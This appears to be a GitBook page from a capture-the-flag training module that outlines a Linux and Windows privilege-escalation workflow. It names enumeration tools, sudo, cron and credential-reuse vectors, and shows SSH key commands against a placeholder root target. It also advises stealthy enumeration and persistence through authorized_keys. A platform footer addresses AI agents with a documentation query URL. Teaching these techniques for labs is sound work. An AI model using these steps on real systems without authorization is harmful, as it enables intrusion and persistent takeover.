> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/getting-started_mod-2/wf-privilege-escalation.md).

# WF-Privilege Escalation

Use this page when you already have low-privilege access and need to move to `root` or `SYSTEM`.

### Quick loop

1. Switch to local enumeration.
2. Collect host data.
3. Check the common vectors.
4. Validate the safest path.
5. Escalate and keep access.

{% stepper %}
{% step %}

### Switch from external to local enumeration

Your first shell is usually restricted.

Stop thinking like an external attacker.

Start looking for local misconfigurations and flaws.

Goal:

* find one strong escalation path
* move from low privilege to `root` or `SYSTEM`
  {% endstep %}

{% step %}

### Collect host data carefully

Before you escalate privileges, collect data about the local operating system configuration.

You can do this manually or with focused enumeration scripts.

Common resources:

* `HackTricks`
* `PayloadsAllTheThings`
* `LinPEAS` or `WinPEAS`
* `LinEnum`, `linuxprivchecker`, `Seatbelt`, or `JAWS`

{% hint style="warning" %}
Automated enumeration scripts create heavy noise. Prefer manual enumeration when stealth matters.
{% endhint %}
{% endstep %}

{% step %}

### Check the common vectors first

Focus on the areas where misconfigurations appear most often.

Start with:

* outdated kernels
* `sudo` rights and user privileges
* scheduled tasks and cron jobs
* exposed credentials and password reuse
* readable or writable SSH keys

These checks usually give the fastest path to higher privilege.
{% endstep %}

{% step %}

### Validate the best path

Pick the lowest-risk vector with the clearest signal.

Use the proof already on the host.

Examples:

* run `sudo -l` to review allowed binaries
* verify whether `/etc/crontab` or `/etc/cron.d` is writable
* check whether a cron script runs from a writable path
* test whether a recovered password works with `su -` or `ssh`
* set key permissions with `chmod 600 id_rsa` before SSH use

{% hint style="warning" %}
Kernel exploits carry high risk. Use them only when safer paths fail and the risk is acceptable.
{% endhint %}
{% endstep %}

{% step %}

### Escalate and keep the better access

Use the confirmed vector to move into the higher-privileged context.

Common outcomes:

* run an allowed privileged binary
* hijack a scheduled task
* switch users with reused credentials
* authenticate with a recovered private key
* append a public key to `authorized_keys` when write access exists

If you use a private key, connect with:

```bash
chmod 600 id_rsa
ssh root@<TARGET_IP> -i id_rsa
```

{% endstep %}
{% endstepper %}

### Fast decision rules

* Prefer `sudo`, creds, or keys before kernel exploits.
* If stealth matters, enumerate manually first.
* If a cron job runs a writable script, use that before riskier paths.
* If you recover a password or key, test it immediately.

### Useful references

* [Getting started](/capcap/readme/ctf-modules/getting-started_mod-2.md)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/getting-started_mod-2/wf-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
